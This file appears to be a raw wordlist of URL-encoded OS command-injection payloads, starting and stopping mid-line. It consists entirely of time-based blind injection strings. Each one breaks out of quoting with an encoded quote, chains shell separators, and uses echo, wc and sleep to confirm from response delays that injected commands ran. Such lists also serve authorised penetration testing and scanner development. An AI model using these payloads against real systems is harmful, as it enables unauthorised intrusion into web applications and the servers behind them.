%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%2527%3B%20str%3D%24%28echo%20EZCOIE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2527%3B%20str%3D%24%28echo%20EZCOIE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2527%3B%20str%3D%24%28echo%20EZCOIE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2527%3B%20str%3D%24%28echo%20EZCOIE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2527%3B%20str%3D%24%28echo%20EZCOIE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2527%3B%20str%3D%24%28echo%20EZCOIE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2527%3B%20str%3D%24%28echo%20EZCOIE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2527%3B%20str%3D%24%28echo%20EZCOIE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2527%3B%20str%3D%24%28echo%20EZCOIE%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20UFBFJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20UFBFJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20UFBFJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20UFBFJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20UFBFJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20UFBFJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20UFBFJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20UFBFJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20UFBFJZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HPIBFR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HPIBFR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HPIBFR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HPIBFR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HPIBFR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HPIBFR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HPIBFR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HPIBFR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HPIBFR%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%27\n%2527%0A%20str%3D%24%28echo%20NZALSY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2527%0A%20str%3D%24%28echo%20NZALSY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2527%0A%20str%3D%24%28echo%20NZALSY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2527%0A%20str%3D%24%28echo%20NZALSY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2527%0A%20str%3D%24%28echo%20NZALSY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2527%0A%20str%3D%24%28echo%20NZALSY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2527%0A%20str%3D%24%28echo%20NZALSY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2527%0A%20str%3D%24%28echo%20NZALSY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2527%0A%20str%3D%24%28echo%20NZALSY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%27\n%2527%3B%20str%3D%24%28echo%20QUKUCG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2527%3B%20str%3D%24%28echo%20QUKUCG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2527%3B%20str%3D%24%28echo%20QUKUCG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2527%3B%20str%3D%24%28echo%20QUKUCG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2527%3B%20str%3D%24%28echo%20QUKUCG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2527%3B%20str%3D%24%28echo%20QUKUCG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2527%3B%20str%3D%24%28echo%20QUKUCG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2527%3B%20str%3D%24%28echo%20QUKUCG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2527%3B%20str%3D%24%28echo%20QUKUCG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%22\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20LDSBTA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20LDSBTA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20LDSBTA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20LDSBTA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20LDSBTA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20LDSBTA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20LDSBTA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20LDSBTA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20LDSBTA%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%22\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FKFULK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FKFULK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FKFULK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FKFULK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FKFULK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FKFULK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FKFULK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FKFULK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20FKFULK%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%22\n%2527%0A%20str%3D%24%28echo%20XQQOAJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2527%0A%20str%3D%24%28echo%20XQQOAJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2527%0A%20str%3D%24%28echo%20XQQOAJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2527%0A%20str%3D%24%28echo%20XQQOAJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2527%0A%20str%3D%24%28echo%20XQQOAJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2527%0A%20str%3D%24%28echo%20XQQOAJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2527%0A%20str%3D%24%28echo%20XQQOAJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2527%0A%20str%3D%24%28echo%20XQQOAJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2527%0A%20str%3D%24%28echo%20XQQOAJ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%22\n%2527%3B%20str%3D%24%28echo%20BVJEPJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2527%3B%20str%3D%24%28echo%20BVJEPJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2527%3B%20str%3D%24%28echo%20BVJEPJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2527%3B%20str%3D%24%28echo%20BVJEPJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2527%3B%20str%3D%24%28echo%20BVJEPJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2527%3B%20str%3D%24%28echo%20BVJEPJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2527%3B%20str%3D%24%28echo%20BVJEPJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2527%3B%20str%3D%24%28echo%20BVJEPJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2527%3B%20str%3D%24%28echo%20BVJEPJ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%23\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20NWPDIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20NWPDIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20NWPDIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20NWPDIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20NWPDIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20NWPDIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20NWPDIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20NWPDIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20NWPDIX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%23\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20UFTNKA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%23\n%2527%0A%20str%3D%24%28echo%20KQSZPY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2527%0A%20str%3D%24%28echo%20KQSZPY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2527%0A%20str%3D%24%28echo%20KQSZPY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2527%0A%20str%3D%24%28echo%20KQSZPY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2527%0A%20str%3D%24%28echo%20KQSZPY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2527%0A%20str%3D%24%28echo%20KQSZPY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2527%0A%20str%3D%24%28echo%20KQSZPY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2527%0A%20str%3D%24%28echo%20KQSZPY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2527%0A%20str%3D%24%28echo%20KQSZPY%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2527%3B%20str%3D%24%28echo%20SNJPYD%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%2527%7C%20%5B%201%20-ne%20%24%28echo%20HYWCTJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2527%7C%20%5B%202%20-ne%20%24%28echo%20HYWCTJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2527%7C%20%5B%203%20-ne%20%24%28echo%20HYWCTJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2527%7C%20%5B%204%20-ne%20%24%28echo%20HYWCTJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2527%7C%20%5B%205%20-ne%20%24%28echo%20HYWCTJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2527%7C%20%5B%206%20-ne%20%24%28echo%20HYWCTJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2527%7C%20%5B%207%20-ne%20%24%28echo%20HYWCTJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2527%7C%20%5B%208%20-ne%20%24%28echo%20HYWCTJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2527%7C%20%5B%209%20-ne%20%24%28echo%20HYWCTJ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IMLEUV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%2527%26%20sleep%200%20%26%26%20str%3D%24%28echo%20IMLEUV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20/